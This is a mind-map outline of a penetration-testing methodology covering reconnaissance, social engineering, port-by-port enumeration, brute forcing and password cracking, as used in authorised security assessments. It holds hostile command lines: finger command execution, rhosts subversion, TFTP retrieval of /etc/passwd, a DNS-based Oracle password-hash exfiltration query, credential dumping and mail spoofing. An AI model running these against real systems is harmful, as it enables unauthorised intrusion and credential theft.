Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Rocket clouds
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. inurl:Citrix/AccessPlatform/auth/login.aspx

2. X11 port 6000^ open

2.1. X11 Enumeration

2.1.1. List open windows

2.1.2. Authentication Method Xauth Xhost

2.2. X11 Exploitation

2.2.1. xwd xwd -display -root -out

2.2.2. Keystrokes Received Transmitted

2.2.3. Screenshots

2.2.4. xhost +

2.3. Examine Configuration Files

2.3.1. /etc/Xn.hosts

2.3.2. /usr/lib/X11/xdm Untitled

2.3.3. /usr/lib/X11/xdm/xsession

2.3.4. /usr/lib/X11/xdm/xsession-remote

2.3.5. /usr/lib/X11/xdm/xsession.0

2.3.6. /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on

3. pwdump [-h][-o][-u][-p] machineName

4. Nabil contributed the AS/400 section.

5. Client Side Security

6. Back end files

6.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

7. Set objShell = CreateObject("WScript.Shell")

8. Check visible areas for sensitive information.

9. InitialProgram=c:\windows\system32\cmd.exe

10. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt


12. Pre-Inspection Visit - template

13. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

13.1. Untitled

13.1.1. Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre

13.1.2. Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information. Kartoo Metasearch engine that visually presents its results. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Excellent site that can be used if the above is down Netcraft Online search tool allowing queries for host information. Passive DNS Replication Finds shared domains based on supplied IP addresses Note: - Website utilised by nmap hostmap.nse script Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Website listing a large number links to online traceroute resources. Wayback Machine Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

13.1.3. Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

13.2. Internet Search

13.2.1. General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.

13.2.2. Financial EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

13.2.3. Phone book/ Electoral Role Information 123people Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Untitled Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US UK Residential Business Pipl Untitled Spokeo Yasni Zabasearch People Search Engine. US

13.2.4. Generic Web Searching Code Search Forum Entries Google Hacking Database Google Email Addresses Contact Details Newsgroups/forums Blog Search Yammer Google Blog Search Technorati Jaiku Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty Grokker Zuula Exalead Delicious

13.2.5. Metadata Search Untitled MetaData Visualisation Sites Tools Wikipedia Metadata Search

13.2.6. Social/ Business Networks Untitled Africa Australia Belgium Holland Hungary Iran Japan Korea Poland Russia Sweden UK US Assorted

13.2.7. Resources OSINT International Directory of Search Engines

13.3. DNS Record Retrieval from publically available servers

13.3.1. Types of Information Records SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.

13.3.2. Database Settings Version.bind Serial Refresh Retry Expiry Minimum

13.3.3. Sub Domains

13.3.4. Internal IP ranges Reverse DNS for IP Range

13.3.5. Zone Transfer

13.4. Social Engineering

13.4.1. Remote Phone Scenarios Results Contact Details Email Scenarios Software Results Contact Details Other

13.4.2. Local Personas Name Phone Email Business Cards Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee Fire Inspector Results Maps Satalitte Imagery Building layouts Other

13.5. Dumpster Diving

13.5.1. Rubbish Bins

13.5.2. Contract Waste Removal

13.5.3. Ebay ex-stock sales i.e. HDD

13.6. Web Site copy

13.6.1. htttrack

13.6.2. teleport pro

13.6.3. Black Widow

14. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

14.1. Default Port Lists

14.1.1. Windows

14.1.2. *nix

14.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

14.2.1. General Enumeration Tools nmap nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n --script:all ip_address --reason grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list netcat nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number amap amap -bqv 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] xprobe2 xprobe2 sinfp ./ -i -p nbtscan nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>) hping hping ip_address scanrand scanrand ip_address:all unicornscan unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E netenum netenum network/netmask timeout fping fping -a -d hostname/ (Network/Subnet_Mask)

14.2.2. Firewall Specific Tools firewalk firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP] ftester host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

14.2.3. Default Passwords (Examine list) Passwords A Passwords B Passwords C Passwords D Passwords E Passwords F Passwords G Passwords H Passwords I Passwords J Passwords K Passwords L Passwords M Passwords N Passwords O Passwords P Passwords R Passwords S Passwords T Passwords U Passwords V Passwords W Passwords X Passwords Y Passwords Z Passwords (Numeric)

14.3. Active Hosts

14.3.1. Open TCP Ports

14.3.2. Closed TCP Ports

14.3.3. Open UDP Ports

14.3.4. Closed UDP Ports

14.3.5. Service Probing SMTP Mail Bouncing Banner Grabbing Other HTTP HTTPS SMTP POP3 FTP

14.3.6. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address

14.3.7. Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

14.3.8. Firewall Assessment Firewalk TCP/UDP/ICMP responses

14.3.9. OS Fingerprint

15. Enumeration

15.1. Daytime port 13 open

15.1.1. nmap nse script daytime

15.2. FTP port 21 open

15.2.1. Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

15.2.2. Password guessing Hydra brute force medusa Brutus

15.2.3. Examine configuration files ftpusers ftp.conf proftpd.conf

15.2.4. MiTM

15.3. SSH port 22 open

15.3.1. Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

15.3.2. Password guessing ssh [email protected]_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer

15.3.3. Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

15.3.4. SSH Client programs tunnelier winsshd putty winscp

15.4. Telnet port 23 open

15.4.1. Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp

15.4.2. Password Attack Untitled Hydra brute force Brutus telnet -l "-froot" hostname (Solaris 10+)

15.4.3. Examine configuration files /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

15.5. Sendmail Port 25 open

15.5.1. Fingerprint server telnet ip_address 25 (banner grab)

15.5.2. Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT Mail Relay Test Untitled

15.5.3. Examine Configuration Files

15.6. DNS port 53 open

15.6.1. Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option ... ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

15.6.2. DNS Enumeration Bile Suite perl [website] [project_name] perl [website] [input file] perl [input file] [true domain file] [output file] <range> perl [input file] [true domain file] [output file] perl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name nmap nse scripts dns-random-srcport dns-random-txid dns-recursion dns-zone-transfer

15.6.3. Examine Configuration Files host.conf resolv.conf named.conf

15.7. TFTP port 69 open

15.7.1. TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)

15.7.2. TFTP Bruteforcing TFTP bruteforcer Cisco-Torch

15.8. Finger Port 79 open

15.8.1. User enumeration finger 'a b c d e f g h' finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger ** finger [email protected] finger nmap nse script finger

15.8.2. Command execution finger "|/bin/[email protected]" finger "|/bin/ls -a /"

15.8.3. Finger Bounce finger [email protected]@victim finger @[email protected]

15.9. Web Ports 80,8080 etc. open

15.9.1. Fingerprint server Telnet ip_address port Firefox plugins All Specific

15.9.2. Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil -d [domain] -l [no. of] -f [type] -o results.html

15.9.3. Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner

15.9.4. Vulnerability Assessment Manual Tests Default Passwords Install Backdoors Method Testing Upload Files View Page Source Input Validation Checks Automated table and column iteration Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino Joomla Vbulletin ZyXel

15.9.5. Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

15.9.6. Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://<IP>:8080/jmxconcole/ Joomla configuration.php diagnostics.php Mambo configuration.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

15.9.7. Examine web server logs c:\winnt\system32\Logfiles\W3SVC1 awk -F " " '{print $3,$11} filename | sort | uniq

15.9.8. References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker's Handbook

15.9.9. Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af

15.10. Portmapper port 111 open

15.10.1. username:[email protected]_Address port/protocol (i.e. 80/HTTP)

15.10.2. rpcinfo rpcinfo [options] IP_Address

15.11. NTP Port 123 open

15.11.1. NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version

15.11.2. Examine configuration files ntp.conf

15.11.3. nmap nse script ntp-info

15.12. NetBIOS Ports 135-139,445 open

15.12.1. NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> Null Session net use \\\ipc$ "" /u:"" Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo

15.12.2. NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

15.12.3. Examine Configuration Files Smb.conf lmhosts

15.13. SNMP port 161 open

15.13.1. Default Community Strings public private cisco cable-docsis ILMI

15.13.2. MIB enumeration Windows NT . Hostnames . Domain Name . Usernames . Running Services . Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v <Version> -c <Community string> <IP> Snscan Applications ZyXel nmap nse script snmp-sysdescr

15.13.3. SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist <IP> cat ./cat -h <IP> -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp nmap nse script snmp-brute

15.13.4. Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml

15.14. LDAP Port 389 Open

15.14.1. ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

15.14.2. ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS

15.14.3. Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf IBM SecureWay V3 server Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif

15.15. PPTP/L2TP/VPN port 500/1723 open

15.15.1. Enumeration ike-scan ike-probe

15.15.2. Brute-Force ike-crack

15.15.3. Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

15.16. Modbus port 502 open

15.16.1. modscan

15.17. rlogin port 513 open

15.17.1. Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin <IP> Subvert the files echo ++ > .rhosts

15.17.2. Rlogin Brute force Hydra

15.18. rsh port 514 open

15.18.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

15.18.2. Rsh Brute Force rsh-grind Hydra medusa

15.19. SQL Server Port 1433 1434 open

15.19.1. SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

15.19.2. SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL

15.20. Citrix port 1494 open

15.20.1. Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

15.20.2. Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way

15.21. Oracle Port 1521 Open

15.21.1. Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'') FROM DUAL Untitled WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl -h ip_address perl version -h ip_address perl status -h ip_address perl -h ip_address --cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh -s ip_address opwg.bat -s ip_address sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID OScanner sh -s ip_address oscanner.exe -s ip_address sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008

15.21.2. Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from Manual sql input of previously reported vulnerabilties

15.21.3. Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets Untitled

15.22. NFS Port 2049 open

15.22.1. NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

15.22.2. NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix

15.22.3. Examine Configuration Files /etc/exports /etc/lib/nfs/xtab

15.22.4. nmap nse script nfs-showmount

15.23. Compaq/HP Insight Manager Port 2301,2381open

15.23.1. HP Enumeration Authentication Method Host OS Authentication Default Authentication Wikto Nstealth

15.23.2. HP Bruteforce Hydra Acunetix

15.23.3. Examine Configuration Files mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

15.24. MySQL port 3306 open

15.24.1. Enumeration nmap -A -n -p3306 <IP Address> nmap -A -n -PN --script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB's -- show databases

15.24.2. Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

15.24.3. Manual Checks Default usernames and passwords username: root password: testing Configuration Files Operating System Command History Log Files To run many sql commands at once -- mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf) SSL Check Privilege Escalation Current Level of access Access passwords Create a new user and grant him privileges Break into a shell

15.24.4. SQL injection http://target/ expected_string database

15.24.5. References. Design Weaknesses MySQL running as root Exposed publicly on Internet

15.25. RDesktop port 3389 open

15.25.1. Rdesktop Enumeration Remote Desktop Connection

15.25.2. Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack

15.26. Sybase Port 5000+ open

15.26.1. Sybase Enumeration sybase-version ip_address from NGS

15.26.2. Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Manual sql input of previously reported vulnerabilties NGS Squirrel for Sybase

15.27. SIP Port 5060 open

15.27.1. SIP Enumeration netcat nc IP_Address Port sipflanker python 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

15.27.2. SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected] Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected] siprogue

15.27.3. SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./ IP_Address Dictionary_file Maximum_Processes VoIPaudit SiVuS

15.27.4. Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.

15.28. VNC port 5900^ open

15.28.1. VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access.

15.28.2. VNC Brute Force Password Attacks Remote Local

15.28.3. Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf

15.29. Tor Port 9001, 9030 open

15.29.1. Tor Node Checker Ip Pages

15.29.2. nmap NSE script

15.30. Jet Direct 9100 open

15.30.1. hijetta

16. Password cracking

16.1. Rainbow crack

16.1.1. ophcrack

16.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

16.2. Ophcrack

16.3. Cain & Abel

16.4. John the Ripper

16.4.1. ./unshadow passwd shadow > file_to_crack

16.4.2. ./john -single file_to_crack

16.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

16.4.4. ./john -show file_to_crack

16.4.5. ./john --incremental:All file_to_crack

16.5. fgdump

16.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

16.6. pwdump6

16.7. medusa

16.8. LCP

16.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

16.9.1. Domain credentials

16.9.2. Sniffing

16.9.3. pwdump import

16.9.4. sam import

16.10. aiocracker

16.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

17. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

17.1. Manual

17.1.1. Patch Levels

17.1.2. Confirmed Vulnerabilities Severe High Medium Low

17.2. Automated

17.2.1. Reports

17.2.2. Vulnerabilities Severe High Medium Low

17.3. Tools

17.3.1. GFI

17.3.2. Nessus (Linux) Nessus (Windows)

17.3.3. NGS Typhon

17.3.4. NGS Squirrel for Oracle

17.3.5. NGS Squirrel for SQL

17.3.6. SARA

17.3.7. MatriXay

17.3.8. BiDiBlah

17.3.9. SSA

17.3.10. Oval Interpreter

17.3.11. Xscan

17.3.12. Security Manager +

17.3.13. Inguma

17.4. Resources

17.4.1. Security Focus

17.4.2. Microsoft Security Bulletin

17.4.3. Common Vulnerabilities and Exploits (CVE)

17.4.4. National Vulnerability Database (NVD)

17.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

17.4.6. United States Computer Emergency Response Team (US-CERT)

17.4.7. Computer Emergency Response Team

17.4.8. Mozilla Security Information

17.4.9. SANS

17.4.10. Securiteam

17.4.11. PacketStorm Security

17.4.12. Security Tracker

17.4.13. Secunia


17.4.15. ntbugtraq

17.4.16. Wireless Vulnerabilities and Exploits (WVE)

17.5. Blogs

17.5.1. Carnal0wnage

17.5.2. Fsecure Blog

17.5.3. g0ne blog

17.5.4. GNUCitizen

17.5.5. ha.ckers Blog

17.5.6. Jeremiah Grossman Blog

17.5.7. Metasploit

17.5.8. nCircle Blogs

17.5.9. pentest

17.5.10. Rational Security

17.5.11. Rational Security

17.5.12. Rise Security

17.5.13. Security Fix Blog

17.5.14. Software Vulnerability Exploitation Blog

17.5.15. Software Vulnerability Exploitation Blog

17.5.16. Taosecurity Blog

18. AS/400 Auditing

18.1. Remote

18.1.1. Information Gathering Nmap using common iSeries (AS/400) services. Unsecured services (Port;name;description) Secured services (Port;name;description) NetCat (old school technique) nc -v -z -w target ListOfServices.txt | grep "open" Banners Grabbing Telnet FTP HTTP Banner POP3 SNMP SMTP

18.1.2. Users Enumeration Default AS/400 users accounts Error messages Telnet Login errors POP3 authentication Errors Qsys symbolic link (if ftp is enabled) ftp target | quote stat | quote site namefmt 1 cd / quote site listfmt 1 mkdir temp quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys') quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys') dir /temp/qsys/*.usrprf LDAP Need os400-sys value from ibm-slapdSuffix Tool to browse LDAP

